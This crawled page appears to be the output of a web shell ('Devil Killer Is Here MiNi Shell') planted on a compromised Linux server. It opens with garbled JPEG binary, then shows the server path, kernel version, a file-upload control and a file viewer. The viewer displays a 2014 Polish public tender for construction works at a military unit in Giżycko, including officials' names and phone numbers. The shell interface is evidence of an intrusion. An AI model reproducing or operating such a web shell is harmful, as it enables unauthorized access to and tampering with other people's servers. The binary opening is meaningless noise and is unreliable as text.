JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140711/151339-N-2014.html

<p class="kh_header"><b>Giżycko: ROBOTY BUDOWLANE 
W BUDYNKU NR 23,24,10, NA TERENIE 
JEDNOSTKI WOJSKOWEJ NR 3797 W GIŻYCKU
PRZY AL. 1 MAJA 11</b><br>
<b>Numer ogłoszenia: 151339 - 2014; data zamieszczenia: 11.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona Narodowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE 
W BUDYNKU NR 23,24,10, NA TERENIE 
JEDNOSTKI WOJSKOWEJ NR 3797 W GIŻYCKU
PRZY AL. 1 MAJA 11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
- Remont magazynów MPS nr 23 i 24 JW. 3797 al. 1-go Maja 11 w Giżycku;
- Remont świetlików dachowych na budynku nr 10 w JW. 3797 Giżycko  al.1-go Maja 11  
Opis budynku nr 23 i 24 oraz ogrodzenia wewnętrznego JW. 3797 Giżycko 
al.1 Maja 11:
Budynki nr 23 i 24 wolnostojące o konstrukcji murowanej, jednokondygnacyjne.      
Dachy budynków betonowe pokryte papą. Stolarka okienna drewniana, drzwiowa stalowa. Budynki wyposażone są w instalację odgromową. Ogrodzenie wewnętrzne z siatki na słupkach żelbetowych i stalowych.
Opis budynku nr 10 w JW. 3797 Giżycko al. 1-go Maja 11  
Budynek parterowy z poddaszem, nie podpiwniczony ze ścianami murowanymi, konstrukcja dachu - stropodach pełny. Zewnętrzna stolarka okienna oraz drzwiowa w stanie dobrym, wewnętrzna stolarka okienna oraz drzwiowa do wymiany. Obiekt wyposażony we wszystkie instalacje.
- kubatura zewnętrzna       - 2.636m3 
- powierzchnia ogólna        -   552m2 

Ogólny zakres robót do wykonania (dokładny zakres prac podany jest 
w przedmiarze robót):

1.	Zakres robót do wykonania w budynku nr 23, 24:
1.1.	Rozebranie posadzki cegłygr.1/2 cegły.
1.2.	Skucie cokołu betonowego wokół budynku.
1.3.	Skucie podjazdy i schodów - zejścia betonowych do budynków.
1.4.	Demontaż wywietrzaków dachowych.
1.5.	Rozebranie pokrycia dachu z dwóch warstw papy.
1.6.	Demontaż parapetów oraz obróbki daszku z blachy nie nadającej się do obróbki.
1.7.	Wykucie z muru okien drewnianych o powierzchni do 1m2.
1.8.	Wykucie z muru drzwi i ościeżnic stalowych o powierzchni ponad 2m2.
1.9.	Demontaż parapetów oraz obróbki daszku z blachy nie nadającej się do obróbki.
1.10.	Demontaż słupów żelbetowych.
1.11.	Wywóz elementów metalowych samochodami skrzyniowymi do magazynu SOI w Giżycku.
1.12.	Wywóz gruzu samochodami samowyładowczymi na odległość do 5km.
1.13.	Osadzenie bram metalowych dwuskrzydłowych o wymiarach 2,44x2,23m 
rozwieranych, dwuskrzydłowych - symetrycznie dzielonych, ocieplanych  
pianką poliuretanową gr. minimum 40mm. Ramy (konstrukcja) skrzydeł z 
kształtowników ocynkowanych zamkniętych 40x60x3mm, bramy wypełnione blachą profilowaną trapezową (profil optyczny) powlekaną w kolorze brązowym RAL 8016 lub 8017, wyposażone w dwa zamki z wkładką patentową, plombowniczkę i klamkę. Montaż ościeży bram z kątownika 80x80x10 walcowanego zabezpieczonego antykorozyjnie wraz z obróbka ościeży oraz montaż progów wejściowych. Osadzenie zasuw w podłożu do blokowania otwartych bram.
1.14.	Wykonanie spadków pod obróbki blacharskie.
1.15.	Osadzenie parapetów zewnętrznych z blachy ocynkowanej gr.0,55mm.
1.16.	Osadzenie okna PCV uchylnego 1,30x0,65m w kolorze białym z profila pięciokomorowego, z szybą zespoloną o właściwościach termicznych K< 1.1 - 14szt.
1.17.	Osadzenie mechanizmu do otwierania okna z poziomu (od podłogi) 120cm.
1.18.	Oklejenie okien folią uniemożliwiającą naświetlenie pomieszczeń - matujące szyby.
1.19.	Odgrzybianie ścian ceglanych metodą smarowania, ponad 5m2, 2-krotnie.
1.20.	Wykonanie ręczne tynków wewnętrznych kat. III na ścianach.
1.21.	Przecieranie istniejących tynków wewnętrznych, z zeskrobaniem farby na stropach.
1.22.	Podkłady betonowe na podłożu gruntowym pod posadzki z betonu B-20 gr.7cm.
1.23.	Izolacja posadzki z folii posadzkowej.
1.24.	Zbrojenie posadzki siatką stalową.
1.25.	Wykonanie posadzki cementowej gr.5cm.
1.26.	Malowanie dwukrotne posadzki farbą epoksydową dwuskładnikową, odporną na ścieranie i bardzo odporną na chemicznie na oleje, rozpuszczalniki oraz kwasy.
1.27.	Dwukrotne malowanie ścian i sufitów farbą emulsyjną.
1.28.	Wykonanie warstwy wyrównawczej gr.20mm pod papę termozgrzewalną.
1.29.	Pokrycie dachu dwoma warstwami papy termozgrzewalnej (papa podkładowa modyfikowana SBS osnowa na włókninie poliestrowej 180g/m2 grubości 4,00mm, papa wierzchniego krycia modyfikowana SBS na osnowie włókninie poliestrowej 250g/m2 grubości 5,2mm.
1.30.	Montaż rynny dachowej półokrągłej o średnicy 12cm z blachy ocynkowanej gr.0,55mm.
1.31.	Montaż rury o średnicy 10cm z blachy ocynkowanej gr.0,55mm.
1.32.	Wykonanie obróbek daszku, pasu nadrynnowego oraz wywietrzaków z blachy ocynkowanej gr. 0,55mm. 
1.33.	Podstawy dachowe stalowe kołowe typ B/II w układach kanałowych o średnicy do 250mm.
1.34.	Podstawy dachowe stalowe kołowe typ B/II w układach kanałowych o średnicy do 315mm.
1.35.	Wywietrzaki dachowe o średnicy do 200mm cylindryczne.
1.36.	Wywietrzaki dachowe o średnicy do 315mm cylindryczne.
1.37.	Wykopy o ścianach pionowych przy odkrywaniu odcinkami istniejących fundamentów o głębokość do 1,5m w gruncie kategorii III - na odkład do ponownego zasypania.
1.38.	Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej 2-warstwowej.
1.39.	Izolacja ścian z folii kubełkowej wraz z wykończeniem listwą profilowaną wykończeniową.
1.40.	Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii III.
1.41.	Przecieranie istniejących tynków zewnętrznych cementowo-wapiennych ścian kategorii III.
1.42.	Dwukrotne malowanie ścian zewnętrznych farbą emulsyjną elewacyjną (kolor farby do uzgodnienia z Inwestorem).
1.43.	Zeskrobanie starej farby wraz z oczyszczeniem oraz dwukrotne malowanie farbą olejną krat okiennych.
1.44.	Wykonanie opaski o szerokości 70cm i gr.15cm z betonu B20 wokół budynku.
1.45.	Ułożenie chodnika przed budynkiem z polbruku gr.6cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem.
1.46.	Rowki pod krawężniki i ławy krawężnikowe 20x20cm grunt kategorii III-IV pod policzki oraz podstopnice schodów zewnętrznych.
1.47.	Ławy pod krawężniki jw. betonowe zwykłe z betonu B-20.
1.48.	Obrzeża betonowe 30x8cm na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementową - policzki oraz podstopnice schodów zewnętrznych.
1.49.	Wykonanie zjazdu oraz schodów zewnętrznych do budynków z kostki betonowej Polbruk grubości 60mm na podsypce cementowo-piaskowej grubości 50mm z wypełnieniem spoin zaprawą cementową.
1.50.	Demontaż wsporników odstępowych instalacji odgromowej na dachu płaskim na papie na betonie.
1.51.	Demontaż przewodów wyrównawczych i odgromowych z płaskownika lub
1.52.	 Pręta mocowanych na dachu płaskim.
1.53.	Montaż uziomu powierzchniowego w wykopie o głęb. Do 60cm w gruncie 
kat. III.
1.54.	Montaż przewodów odprowadzających instalacji odgromowej na budynku, podłoże z cegły, mechaniczne wykonanie otworu, bednarka 120mm2.
1.55.	Łączenie przewodów uziemniających przez spawanie w wykopie - bednarka 120mm2.
1.56.	Montaż osłon przewodów uziemniających o długości do 2m na podłożu z 
cegły. Montaż wsporników dla instalacji odgromowej naprężanej na ścianach i dachach, naciągane z 1 złączką przelotową naprężającą, na ścianie z cegły. Montaż zwodów poziomych inst. odgromowej naprężanych z pręta ocynk. o średnicy 8mm na uprzednio zainstalowanych wspornikach na dachu płaskim.
1.57.	Montaż zwodów pionowych inst. odgromowej naprężanych z pręta ocynk. o średnicy 8mm na uprzednio zainstalowanych wspornikach na ścianie.
1.58.	Łączenie pręta o średnicy do 10mm na dachu za pomocą złączy skręcanych uniwersalnych krzyżowych.
1.59.	Montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub
przewodów wyrównawczych.
1.60.	Montaż złączy kontrolnych z podłączeniem drut-płaskownik w instalacji 
odgromowej lub przewodów wyrównawczych.
1.61.	Montaż wsporników dla instalacji naprężanej na dachach, wsporniki przelotowe pośredniczące na dachu betonowym, klejone.
1.62.	Montaż zwodów pionowych instalacji odgromowej na dachu z pręta ocynkowanego Fi do 18mm oraz iglic z ostrzem odgromowym na słupie z rury stalowej Fi do 48mm, zwód na dachu lub dymniku stromym- iglice fi 10 mm dł 1,8mb.
1.63.	Mechaniczne pogrążanie uziomów prętowych, grunt kategorii III.
1.64.	Montaż osłon przewodów uziemiających, długości do 2m, podłoże z cegły.
1.65.	Wykonanie pomiarów instalacji odgromowej.

2. Ogrodzenie wewnętrzne
2.1.	Rozebranie ogrodzenia z siatki na słupkach stalowych obetonowanych.
2.2.	Rozebranie ogrodzenia z siatki na słupkach żelbetowych prefabrykowanych osadzonych w gruncie.
2.3.	Rozebranie bramy wjazdowej z kształtowników stalowych ze słupkami przybramowymi metalowymi.
2.4.	Wywóz elementów metalowych samochodami skrzyniowymi do magazynu SOI w Giżycku.
2.5.	Wywóz gruzu samochodami samowyładowczymi na odległość do 5km.

3.	Zakres robót do wykonania w budynku nr 10
3.1.	rozebranie obróbek blacharskich świetlików;
3.2.	wymiana szklanych świetlików dachowych na świetliki z poliwęglanu;
3.3.	wymiana podstawy pod świetliki;
3.4.	uzupełnienie styropianu;
3.5.	 wykonanie obróbek blacharskich wokół świetlików oraz na połączeniu bud nr 6 i10.
3.6.	uszczelnienie w/w obróbek;
3.7.	pokrycie obróbki blacharskiej papą termozgrzewalną;

4.  Warunki realizacji zadania:
4.1.	Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca inwestycji w terminie od 14.07.2014r. do 18.07.2014r. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej 
z Kierownikiem Sekcji Obsługi Infrastruktury Panem Bogusławem BOROWIEC, tel. 87 429 49 81, bądź z z-cą Panem Zdzisławem POMICHOWSKIM, tel. 727 040 516. Koszt takiej wizyty ponosi Wykonawca.
4.2.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym na dwa dni przed podpisaniem umowy dostarczył do Kierownika Wydziału Infrastruktury przy ul. Moniuszki 7 w Giżycku;
4.2.1.	trzy egzemplarze kosztorysu ofertowego, sporządzonego metodą szczegółową wraz z zestawieniem cen jednostkowych materiałów 
i sprzętu sporządzone wg założeń do kosztorysowania (załącznik nr 8 do SIWZ) na podstawie przedmiarów, które będą stanowiły załącznik do umowy. Niniejszy kosztorys ofertowy będzie stanowił podstawę obliczenia wynagrodzenia Wykonawcy należnego mu 
z tytułu wykonania części przedmiotu zamówienia 
w przypadku przerwania realizacji zamówienia z winy Wykonawcy, bądź z przyczyn leżących po stronie Zamawiającego. 
4.2.2.	trzy egzemplarze harmonogramu rzeczowo - finansowego realizacji zadania (załącznik nr 10 do SIWZ) uzgodnione 
z Kierownikiem Sekcji Obsługi Infrastruktury.
4.3.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy ustanowił kierownika budowy (robót) posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane) oraz dostarczył dowód jego przynależności do Izby Inżynierów Budownictwa.
4.4.	Realizacja robót: w godzinach 700-1500 (istnieje możliwość pracy do godziny 1800 w dniach poniedziałek- piątek oraz do godz.1500 w sobotę po uzgodnieniu z Dowódcą Jednostki).
4.5.	Roboty będą prowadzone w czynnym zakładzie. 
4.6.	Wykonawca robót (kierownik budowy) w pełni odpowiada za bezpieczeństwo i higienę pracy w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego.
4.7.	Wszystkie prace rozbiórkowe i montażowe Wykonawca winien wykonywać 
z zachowaniem wymogów bezpieczeństwa w odniesieniu do ludzi i mienia.
4.8.	Wykonawca wyznaczy koordynatora do spraw BHP, który będzie współpracował z Inspektorem BHP wskazanym przez Dowódcę JW. 3797
4.9.	Wykonawca w ciągu 3 dni od podpisania umowy przekaże Inspektorowi BHP wskazanym przez Dowódcę JW. 3797, oświadczenie o treści zgodnej 
z załącznikiem nr 3 do umowy (załącznik nr 11 do SIWZ) wraz z wykazem pracowników realizujących zadanie objęte niniejsza umową.
4.10.	Wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy.
4.11.	Zbiór wymagań szczegółowych dotyczących organizacji robót, standardu 
i jakości wykonania, właściwości zastosowania wyrobów budowlanych oraz metod i sposobu oceny jakości wykonania zleconych prac określono 
w Specyfikacji Technicznej wykonania i odbioru robót budowlanych. 
4.12.	Utylizacja papy w ramach kosztów ogólnych budowy. Dokument potwierdzający z dokonanej utylizacji należy dołączyć do dokumentów 
w dniu odbioru robót. 
4.13.	W przypadku uszkodzenia systemów alarmowych, p.poż, sieci jawnych, niejawnych, sieci telefonicznej, elektrycznej, komputerowej, wodociągowej, kanalizacyjnej, ciepłowniczej, gazowej itp. Wykonawca usunie awarię 
w ciągu 48 godzin od zdarzenia zgodnie z obowiązującymi Normami. 
W przypadku nie usunięcia awarii w wyznaczonym terminie Zamawiający zleci wykonanie usunięcia awarii osobie trzeciej na koszt Wykonawcy.
4.14.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dokonał ubezpieczenia budowy na kwotę nie mniejszą niż: cena za realizację niniejszego zamówienia zaproponowana w ofercie. Dokument potwierdzający ubezpieczenie Wykonawca przedstawi Zamawiającemu najpóźniej w dniu podpisania umowy.
4.15.	Wykonawca odpowiedzialny jest za całokształt, w tym przebieg oraz terminowe wykonanie zamówienia w okresie wykonywania umowy. 
4.16.	Wykonawca odpowiedzialny jest, za jakość robót, ich zgodność 
z dokumentacją techniczną. Wymagana jest należyta staranność przy realizacji zamówienia. 
4.17.	Wykonawca ponosi odpowiedzialność za szkody wyrządzone w mieniu oraz na rzecz osób trzecich, wyrządzone w trakcie realizacji obowiązków wynikających z treści zawartej umowy.

5.	Lokalizacja robót:
Roboty realizowane będą na terenie Jednostki Wojskowej Nr 3797 w Giżycku przy al. 1-go Maja 11. Obowiązkiem Wykonawcy wobec Pełnomocnika Dowódcy JW. 3797 ds. Ochrony Informacji Niejawnych jest przed rozpoczęciem robót dostarczenie listy pracowników wraz z numerami dowodów tożsamości oraz 
nr rejestracyjne i marki pojazdów zabezpieczających prace..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
1.1.	Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 5 000,00 zł. (słownie: pięć tysięcy złotych).
1.2.	Wadium musi być wniesione przed upływem terminu składania ofert.
1.3.	Wadium może być wnoszone w jednej lub w kilku następujących formach: 
pieniądzu;
poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez: NBP O/O Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium w post. nr 64/2014 - roboty budowlane 
w budynku nr 23,24,10 na terenie JW. Nr 3797
1.4.	Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem

2.	Zwrot i zatrzymanie wadium. 
2.1.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
- dokona wyboru oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
   - unieważni postępowanie o udzielenie zamówienia.
2.2.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
2.3.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko-wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
2.4.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca                          w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2.5	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
2.5.1	 odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2.5.2	 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie wykonawcy. 
.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania 
uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania  osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, jeżeli przedłoży opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 100 000,00 zł.
UWAGA: Fakt opłacenia polisy musi wynikać bądź z jej treści (adnotacja ubezpieczyciela), bądź z jakiegokolwiek dokumentu potwierdzającego fakt opłacenia składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

